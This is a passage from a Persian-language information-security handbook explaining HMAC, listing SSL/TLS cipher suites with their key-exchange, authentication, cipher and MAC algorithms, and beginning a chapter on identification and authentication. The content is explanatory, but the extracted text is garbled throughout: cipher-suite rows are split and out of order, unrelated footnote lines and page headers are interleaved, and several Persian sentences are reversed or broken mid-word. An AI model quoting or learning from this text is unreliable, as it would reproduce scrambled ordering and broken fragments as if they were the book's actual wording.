ﺳﭙﺲ HMACﻣﺤﺎﺳﺒﻪ ﺷﺪﻩ ﺭﺍ ﺑﺎ HMACﺩﺭﻳﺎﻓﺖ ﺷﺪﻩ ﻣﻘﺎﻳﺴﻪ ﻣﻲﻛﻨﺪ ﺗﺎ ﺑﺒﻴﻨﺪ ﻛﻪ ﺁﻳﺎ ﻣﻄﺎﺑﻘﺖ ﺩﺍﺭﻧﺪ ﻳﺎ ﺧﻴﺮ ،ﻭ ﺍﮔﺮ ﻣﻄﺎﺑﻘﺖ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷﻨﺪ ،ﺁﻧﮕﺎﻩ ﭼﻮﻥ ﺧﻼﺻﻪﭘﻴﺎﻡ ﻋﻮﺽ ﻧﺸﺪﻩ ،ﮔﻴﺮﻧﺪﻩ ﺧﻮﺍﻫﺪ ﺩﺍﻧﺴﺖ ﻛﻪ ﭘﻴﺎﻡ ﺍﺻﻠﻲ ﺗﻐﻴﻴﺮ ﭘﻴﺪﺍ ﻧﻜﺮﺩﻩ ﺍﺳﺖ.
Au=RSA Enc=3DES(168) Mac=SHA1
Au=DSS Enc=3DES(168) Mac=SHA1
Au=RSA Enc=3DES(168) Mac=SHA1
EDH-RSA-DES-CBC3-SHA SSLv3 Kx=DH
EDH-DSS-DES-CBC3-SHA SSLv3 Kx=DH
DES-CBC3-SHA
SSLv3 Kx=RSA
123 W. Curtis Preston
124 Unix Backup And Recovery
125 Hash Message Authentication Code
ﺑﺨﺶ ﭘﻨﺠﻢ
ﻣﻌﻤﻮ ﹰ
ﻻ HMACﻫﺎ ﺑﺮﺍﻱ ﻣﻘﺎﻭﻡ ﻛﺮﺩﻥ ﭘﻴﺎﻣﻬﺎﻱ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﺷﺒﻜﻪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧـﺪ ،ﭼـﻮﻥ ﺑـﻪ ﻧـﺴﺒﺖ ﺍﻣـﻀﺎﻫﺎﻱ
ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺴﻴﺎﺭ ﺳﺮﻳﻌﺘﺮ ﻣﺤﺎﺳﺒﻪ ﻣﻲﺷﻮﻧﺪ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﺯ ﻧﻈﺮ ﺍﻧﺪﺍﺯﻩ ﻛﻮﭼﻜﺘﺮ ﻫﺴﺘﻨﺪ .ﻋﻠﻴﺮﻏﻢ ﺍﻳﻦ ﻣﻮﺍﺭﺩHMAC ،ﻫـﺎ ﺑـﺮ ﺍﺳـﺎﺱ ﻳـﻚ
ﻻ ﺑﺎ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ
ﻛﻠﻴﺪ ﻣﺸﺘﺮﮎ ﭘﺎﻳﻪﮔﺬﺍﺭﻱ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺑﺎﻳﺪ ﺍﺯ ﺧﻄﺮ ﻣﺤﺎﻓﻈﺖ ﺷﻮﺩ ،ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﻣﻀﺎﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻣﻌﻤﻮ ﹰ
ﻻ ﺍﺯ ﺗﺮﻛﻴـﺐ
ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ .ﭼﻨﺪﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺍﻳﻤﻦﺳﺎﺯﻱ ﺍﺗﺼﺎﻻﺕ ﺷﺒﻜﻪ ﺳﺎﺧﺘﻪ ﺷﺪﻩﺍﻧـﺪ .ﺍﻳـﻦ ﭘﺮﻭﺗﻜﻠﻬـﺎ ﻣﻌﻤـﻮ ﹰ
ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺳﺎﺧﺘﻪ ﺷﺪﻩﺍﻧﺪ ﺗﺎ ﻣﺒﺎﺩﻟﺔ ﻛﻠﻴﺪ ،ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ،ﺭﻣﺰﮔﺬﺍﺭﻱ ،ﻭ ﺗﺼﺪﻳﻖ ﺻﺤﺖ ﭘﻴﺎﻡ ﺭﺍ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻛﻨﻨﺪ ،ﺑـﻪ ﺍﺿـﺎﻓﺔ
ﻣﺸﺨﺼﺎﺕ ﺍﻳﻨﻜﻪ ﻳﻚ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻭ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﭼﮕﻮﻧﻪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ،ﺍﺳﺘﻮﺍﺭﻧﺎﻣﻪﻫﺎﻱ ﺗﺒﺎﺩﻟﻲ ﻭ ﻛﻠﻴﺪﻫﺎﻱ ﺟﻠـﺴﻪ ﺑـﻪ
ﺗﻮﺍﻓﻖ ﺧﻮﺍﻫﻨﺪ ﺭﺳﻴﺪ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﭘﺮﻭﺗﻜﻞ SSL/TLSﺍﺯ ﺍﻳﻦ ﺗﺮﻛﻴﺒﺎﺕ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﺪ:
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
٣١٢
DHE-DSS-RC4-SHA
SSLv3 Kx=DH Au=DSS Enc=RC4(128) Mac=SHA1
RC4-SHA SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=SHA1
RC4-MD5 SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=MD5
EXP1024-DHE-DSS-RC4-SHA SSLv3 Kx=DH(1024) Au=DSS Enc=RC4(56) Mac=SHA1 export
EXP1024-RC4-SHA SSLv3 Kx=RSA(1024) Au=RSA Enc=RC4(56) Mac=SHA1 export
EXP1024-DHE-DSS-DES-CBC-SHA SSLv3 Kx=DH(1024) Au=DSS Enc=DES(56) Mac=SHA1
export
EXP1024-DES-CBC-SHA SSLv3 Kx=RSA(1024) Au=RSA Enc=DES(56) Mac=SHA1 export
EXP1024-RC2-CBC-MD5 SSLv3 Kx=RSA(1024) Au=RSA Enc=RC2(56) Mac=MD5 export
EXP1024-RC4-MD5 SSLv3 Kx=RSA(1024) Au=RSA Enc=RC4(56) Mac=MD5 export
EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH Au=RSA Enc=DES(56) Mac=SHA1
EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH Au=DSS Enc=DES(56) Mac=SHA1
DES-CBC-SHA SSLv3 Kx=RSA Au=RSA Enc=DES(56) Mac=SHA1
EXP-EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH(512) Au=RSA Enc=DES(40) Mac=SHA1 export
EXP-EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH(512) Au=DSS Enc=DES(40) Mac=SHA1 export
EXP-DES-CBC-SHA SSLv3 Kx=RSA(512) Au=RSA Enc=DES(40) Mac=SHA1 export
EXP-RC2-CBC-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC2(40) Mac=MD5 export
EXP-RC4-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC4(40) Mac=MD5 export
ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ،( ﺑﺎﺷـﺪRSA ﻳـﺎDiffi-Hellman ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ،Kx) ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﺍ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺟﻬﺖ ﻣﺒﺎﺩﻟﺔ ﻛﻠﻴﺪ،ﺐ ﺍﻟﮕﻮﺭﻳﺘﻢ
ﻫﺮ ﺗﺮﻛﻴ ﹺ
ﻭ ﻛـﺪﻫﺎﻱ،( ﺑﺎ ﻃﻮﻝ ﻛﻠﻴـﺪ ﻣﻌـﻴﻦ ﺑﺎﺷـﺪRC2 ﻳﺎ،RC4 ، ﺳﻪﮔﺎﻧﻪDES ،DES ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ،Enc) ﺭﻣﺰﮔﺬﺍﺭﻱ،( ﺑﺎﺷﺪDSS ﻳﺎRSA ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ،Au)
. ﺑﺎﺷﺪ( ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪMD5 ﻳﺎSHA1 ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ،Mac) ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﭘﻴﺎﻡ
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
٣١٣
ﻓﺼﻞ ﭘﻨﺠﻢ
ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ
ﻛﻠﻴﺎﺕ
ﺷﻨﺎﺳﺎﻳﻲ ﺍﺭﺗﺒﺎﻁ ﺩﺍﺩﻥ ﻳﻚ ﻫﻮﻳﺖ ﺑﺎ ﻳﻚ ﻣﻮﺿﻮﻉ ﺍﺳﺖ .ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ،ﺍﻋﺘﺒﺎﺭ ﻳﻚ ﻫﻮﻳﺖ ﺭﺍ ﺑﻪ ﺍﺛﺒﺎﺕ ﻣـﻲﺭﺳـﺎﻧﺪ؛ ﻭ ﺗـﺼﺪﻳﻖ ﺍﺧﺘﻴـﺎﺭ،
ﺍﺭﺗﺒﺎﻁ ﺩﺍﺩﻥ ﺣﻘﻮﻕ ﻳﺎ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺑﺎ ﻳﻚ ﻫﻮﻳﺖ ﻣﻲﺑﺎﺷﺪ .ﺍﻳﻦ ﻓﺼﻞ ﺭﻭﻱ ﺩﻭ ﻣﻔﻬﻮﻡ ﺑﺎﻻ ﺗﺄﻛﻴﺪ ﺩﺍﺭﺩ .ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻣﻤﻜـﻦ
ﺍﺳﺖ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﻪ ﻓﺮﺩ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﺍﻧﺠﺎﻡ ﺷﻮﺩ ،ﻳﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳـﻚ ﺳﻴـﺴﺘﻢ ﻣﺒﺘﻨـﻲ ﺑـﺮ ﺷـﺒﻜﻪ
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻫﻮﻳﺘﻬﺎﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻣﺮﻛﺰﻱ ﺫﺧﻴـﺮﻩ ﺷـﺪﻩ ﻭ ﺗﻮﺳـﻂ ﮔﺮﻭﻫﻬـﺎﻱ
ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪ ﺷﺪﻩ ﺍﺳﺖ.
ﻓﻨﻮﻥ ﺷﻨﺎﺳﺎﻳﻲ
ﺭﺍﻳﺎﻧﻪﻫﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻣﺨﺘﻠﻔﻲ ﺭﺍ ﺑﻜﺎﺭ ﻣﻲﺑﺮﻧﺪ .ﺳﺎﺩﻩﺗﺮﻳﻦ ﺁﻧﻬﺎ ﺑﺮ ﺍﺳﺎﺱ ﺍﺳﺎﻣﻲ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭ ﻣﻲﻛﻨﻨـﺪ ،ﻭ ﺑﻘﻴـﻪ
ﺑﺮ ﺍﺳﺎﺱ ﺳﺨﺖﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺼﻮﺻﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﺸﺨﺼﺎﺕ ﻣﻤﻴﺰﺓ ﺍﻧﺴﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺭﺍ ﺑﺴﻨﺠﻨﺪ .ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ
ﻛﻪ ﺑﺮ ﺍﺳﺎﺱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ.
ﻫﻴﭽﻴﻚ ﺍﺯ ﺗﻜﻨﻴﻜﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺍﻳﻨﮕﻮﻧﻪ ﻧﻴﺴﺘﻨﺪ ﻛﻪ ﻫﺮﮔﺰ ﻧﺘﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﺍﺷﺘﺒﺎﻩ ﺍﻧﺪﺍﺧﺖ ﻭ ﺍﺯ ﺳﺪﺷﺎﻥ ﻋﺒﻮﺭ ﻛـﺮﺩ؛ ﻭ ﺍﻟﺒﺘـﻪ ﺧﻮﺷـﺒﺨﺘﺎﻧﻪ
ﺍﻛﺜﺮ ﺁﻧﻬﺎ ﻧﻴﺎﺯﻱ ﻧﺪﺍﺭﻧﺪ ﻛﻪ ﺍﻳﻨﮕﻮﻧﻪ ﺑﺎﺷﻨﺪ .ﻫﺪﻑ ﺍﻛﺜﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻏﻴﺮﻣﻤﻜﻦ ﻛﺮﺩﻥ ﺟﻌﻞ ﻫﻮﻳﺖ ﻧﻴﺴﺖ ،ﺑﻠﻜﻪ ﻛﺎﻫﺶ ﻣﺨـﺎﻃﺮﺓ
ﺟﻌﻞ ﻫﻮﻳﺖ ﻭ ﻣﻴﺰﺍﻥ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﻩ ﺑﻪ ﻳﻚ ﺳﻄﺢ ﻗﺎﺑﻞ ﻗﺒﻮﻝ ﺍﺳﺖ .ﻳﻚ ﻫﺪﻑ ﻣﻬﻢ ﺩﻳﮕﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺗﻌﻴﻴﻦ ﻛﻤـﻲ ﻣﻘـﺪﺍﺭ
ﻣﺨﺎﻃﺮﻩﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻌﺪ ﺍﺯ ﺍﺳﺘﻘﺮﺍﺭ ﺳﻴﺴﺘﻢ ﻫﻨﻮﺯ ﺑﺎﻗﻲ ﻣﺎﻧﺪﻩ ﺍﺳﺖ؛ ﭼﺮﺍﮐﻪ ﺗﻌﻴﻴﻦ ﻛﻤﻲ ﻣﻘﺪﺍﺭ ﻣﺨﺎﻃﺮﺓ ﺑﺎﻗﻴﻤﺎﻧـﺪﻩ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ ﻛـﻪ
ﺳﺎﺯﻣﺎﻥ ﺑﺘﻮﺍﻧﺪ ﺩﺭﺑﺎﺭﺓ ﺳﻴﺎﺳﺘﻬﺎ ،ﻧﻴﺎﺯ ﻳﺎ ﺗﻤﺎﻳﻞ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺟﺎﻳﮕﺰﻳﻦ ،ﻭ ﺣﺘﻲ ﻣﻴﺰﺍﻥ ﭘﻮﺷـﺶ ﻻﺯﻡ ﺑﻴﻤـﻪ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺩﺭ
ﻣﻘﺎﺑﻞ ﺍﺣﺘﻤﺎﻝ ﻭﻗﻮﻉ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺗﺼﻤﻴﻢ ﺑﮕﻴﺮﺩ.
ﺑﻪ ﻳﻚ ﻓﺮﻭﺩﮔﺎﻩ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﭘﺮﻭﺍﺯ ﻛﻨﻴﺪ ﻭ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻩ ﺍﻋﺘﺒﺎﺭﻱ ﻳﻚ ﺁﮊﺍﻧﺲ ﻛﺮﺍﻳﺔ ﻣﺎﺷﻴﻦ ﺑﻜﺸﻴﺪ ،ﺁﻧﮕﺎﻩ ﻣﻲﺗﻮﺍﻧﻴﺪ
ﺑﺎ ﻳﻚ ﻣﺎﺷﻴﻦ ﻛﻪ ﺷﺎﻳﺪ ﺑﻴﺶ ﺍﺯ ﺑﻴﺴﺖ ﻫﺰﺍﺭ ﺩﻻﺭ ﺍﺭﺯﺵ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺗﺎ ﻣﻘﺼﺪ ﺧﻮﺩ ﺭﺍﻧﻨﺪﮔﻲ ﻛﻨﻴـﺪ .ﺗﻨﻬـﺎ ﺗـﻀﻤﻴﻨﻲ ﻛـﻪ ﺁﮊﺍﻧـﺲ ﻛﺮﺍﻳـﻪ
ﻣﺎﺷﻴﻦ ﺍﺯ ﺷﻤﺎ ﺩﺍﺭﺩ ﻛﻪ ﺍﺗﻮﻣﺒﻴﻞ ﺁﻧﻬﺎ ﺭﺍ ﺑﺎﺯﮔﺮﺩﺍﻧﻴﺪ ﺗﻌﻬﺪ ﺷﻤﺎﺳﺖ -ﻭ ﺍﻃﻼﻉ ﺍﺯ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻛﻪ ﺍﮔﺮ ﺧﻠﻒ ﻭﻋﺪﻩ ﻛﻨﻴـﺪ ،ﺁﻧﻬـﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ
ﻻ ﺑﻪ ﺯﻧﺪﺍﻥ ﺧﻮﺍﻫﻴﺪ ﺍﻓﺘﺎﺩ.
ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺷﻤﺎ ﺭﺍ ﺑﺎﻃﻞ ﻛﻨﻨﺪ ﻭ ﺷﻤﺎ ﺍﺣﺘﻤﺎ ﹰ
ﺍﮔﺮ ﺁﮊﺍﻧﺲ ﻛﺮﺍﻳﻪ ﺷﻤﺎ ﺭﺍ ﻧﻤﻲﺷﻨﺎﺧﺖ ،ﺗﻌﻬﺪ ﺷﻤﺎ ﺑﺮﺍﻱ ﺁﻥ ﻣﻔﻬﻮﻡ ﺧﺎﺻﻲ ﻧﺪﺍﺷﺖ .ﺍﻳﻦ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ ﺭﺍﻧﻨﺪﮔﻲ ،ﮔﺬﺭﻧﺎﻣﻪ ﻭ ﻳﺎ ﻛﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ
ﺷﻤﺎ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻛﻨﺎﺭ ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻪ ﺁﮊﺍﻧﺲ ﻛﺮﺍﻳﻪ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﺪ ﺩﺭ ﻋﺮﺽ ﭼﻨﺪ ﺛﺎﻧﻴﻪ ﺑﻔﻬﻤﺪ ﻛﻪ ﺁﻳـﺎ ﻛـﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﺷـﻤﺎ
ﺩﺯﺩﻱ ﺍﺳﺖ ﻳﺎ ﺧﻴﺮ ،ﻭ ﻣﺤﻞ ﻛﺎﺭﺗﺎﻥ ﻭ ﺷﺮﻛﺖ ﺑﻴﻤﺔ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻧﺮﺍ ﺍﺯ ﺍﻋﺘﻤﺎﺩﻱ ﮐﻪ ﺑﻪ ﺷﻤﺎ ﮐﺮﺩﻩ ﺁﮔﺎﻩ ﻛﻨﺪ.
ﺩﺭ ﻃﺮﺍﺣﻲ ﻣﺪﺍﺭﻙ ﺷﻨﺎﺳﺎﻳﻲ ﭼﺎﭘﻲ ،ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﺭﺯﻳﺎﺑﻲ ﻓﻴﺰﻳﻜﻲ ﺁﻧﻬﺎ ﻣﻼﻙ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ .ﻳﻚ ﮔﺬﺭﻧﺎﻣﻪ ﺑﻪ ﺍﻳـﻦ ﺩﻟﻴـﻞ ﻳـﻚ ﻣـﺪﺭﻙ
ﺷﻨﺎﺳﺎﻳﻲ ﺧﻮﺏ ﺍﺳﺖ ﻛﻪ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﺑﻄﻮﺭ ﻓﻴﺰﻳﻜﻲ ﻗﺎﺑﻞ ﺍﺭﺯﻳﺎﺑﻲ ﻫﺴﺘﻨﺪ )ﺟﻨﺲ ،ﻗﺪ ،ﻭﺯﻥ ،ﻋﻜﺲ ،ﺍﻣـﻀﺎ( ،ﺟﻌـﻞ ﺁﻥ ﻣـﺸﻜﻞ
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺷﻨﺎﺳﺎﻳﻲ ﻓﻴﺰﻳﻜﻲ
٣١٤
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺍﺳﺖ ،ﺑﺮﺍﺣﺘﻲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ ،ﻭ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻣﺮﻛﺰ ﻣﻌﺘﺒﺮ ،ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ ،ﻭ ﻣﺸﻬﻮﺭ ﺻﺎﺩﺭ ﻣـﻲﺷـﻮﺩ ﻛـﻪ ﻗﺒـﻞ ﺍﺯ
ﺻﺪﻭ ﹺﺭ ﻣﺪﺭﻙ ،ﻫﻮﻳﺖ ﻓﺮﺩ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ .ﺑﺮﻋﻜﺲ ،ﻛﺎﺭﺕ ﻋﻀﻮﻳﺖ ﺩﺭ ﻳﻚ ﺑﺎﺷﮕﺎﻩ ﺭﻭﺯﻧﺎﻣﻪﻧﮕـﺎﺭﻱ ﻭﺍﺟـﺪ ﻫﻴﭽﻴـﻚ ﺍﺯ ﺍﻳـﻦ ﺻـﻔﺎﺕ
ﻧﻴﺴﺖ.
ﻓﻨﻮﻥ ﺷﻨﺎﺳﺎﻳﻲ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪ
ﺑﺮﺍﻱ ﺑﻴﺶ ﺍﺯ ﭘﻨﺠﺎﻩ ﺳﺎﻝ ﺍﺳﺖ ﻛﻪ ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﺨﺸﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺑـﺴﻴﺎﺭ ﺑـﺰﺭﮒ ﻫـﺴﺘﻨﺪ .ﺣﺘـﻲ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﻫﻢ ﻛﻪ ﺩﺭ ﺩﻭ ﺩﻫﺔ ﺍﻭﻝ ﻭﺟﻮﺩ ﺧﻮﺩ ﻓﺎﻗﺪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻮﺩﻩﺍﻧﺪ ،ﺍﻛﻨﻮﻥ ﺑﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻣﺠﻬﺰ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨـﺪ
ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ،ﺩﺳﺘﺮﺳﻴﻬﺎ ﺭﺍ ﻛﻨﺘﺮﻝ ﻛﻨﻨﺪ .ﻳﻚ ﺗﻔﺎﻭﺕ ﻛﻠﻴﺪﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨـﻲ ﺑـﺮ
ﺷﻨﺎﺳﻪ ﻛﺎﺭﺑﺮ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﺍ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺪﺍﺭﻙ ﻛﻪ ﺩﺭ ﺍﻭﺍﻳﻞ ﺍﻳﻦ ﻓﺼﻞ ﺩﺭﺑﺎﺭﺓ ﺁﻥ ﺑﺤﺚ ﺷﺪ ﺗﻔﻜﻴﻚ ﻣﻲﻛﻨﺪ .ﻫﺮﭼﻨـﺪ ﺍﻛﺜـﺮ
ﻣﺪﺍﺭﻙ ﺷﻨﺎﺳﺎﻳﻲ ﺑﺎ ﺍﺳﻢ ﻭﺍﻗﻌﻲ ﺍﺷﺨﺎﺻﻲ ﻛﻪ ﺑﺎﻳﺪ ﺷﻨﺎﺳﺎﻳﻲ ﺷﻮﻧﺪ ﭼﺎﭖ ﺷﺪﻩﺍﻧﺪ ،ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﺷﻨﺎﺳﻪ ﻛﺎﺭﺑﺮ ﻭ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﺗﻨﻬـﺎ
ﻋﻼﻗﻪﻣﻨﺪ ﺑﻪ ﺍﺛﺒﺎﺕ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻫﺴﺘﻨﺪ ﻛﻪ ﺷﺨﺼﻲ ﻛﻪ ﺟﻠﻮﻱ ﺻﻔﺤﻪﻛﻠﻴﺪ ﻧﺸﺴﺘﻪ ﻛﺎﺭﺑﺮ ﻣﺠـﺎﺯ ﻳـﻚ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ ﺧـﺎﺹ ﺍﺳـﺖ.
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺳﻨﺘﻲ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺪﺍﺭﻙ ﺑﺎ ﺷﻨﺎﺳﺎﻳﻲ ﻗﻄﻌﻲ ﺳﺮﻭﻛﺎﺭ ﺩﺍﺭﻧﺪ ،ﺩﺭﺣﺎﻟﻴﻜﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﻪ ﻛـﺎﺭﺑﺮ ﻭ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﺑـﺎ ﺷﻨﺎﺳـﺎﻳﻲ
ﻧﺴﺒﻲ ﻳﺎ ﺍﺣﺮﺍﺯ ﺗﺪﺍﻭﻡ ﻣﺠﺎﺯ ﺑﻮﺩﻥ ﺳﺮﻭﻛﺎﺭ ﺩﺍﺭﻧﺪ .ﺍﻧﺠﺎﻡ ﺷﻨﺎﺳﺎﻳﻲ ﻗﻄﻌﻲ ﺑﺮﺍﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻳﻚ ﻋﻤﻞ ﻓﻮﻕﺍﻟﻌﺎﺩﻩ ﻣـﺸﻜﻞ ﺍﺳـﺖ.
ﻻ ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﺭﺍ ﺑﻌﻨـﻮﺍﻥ
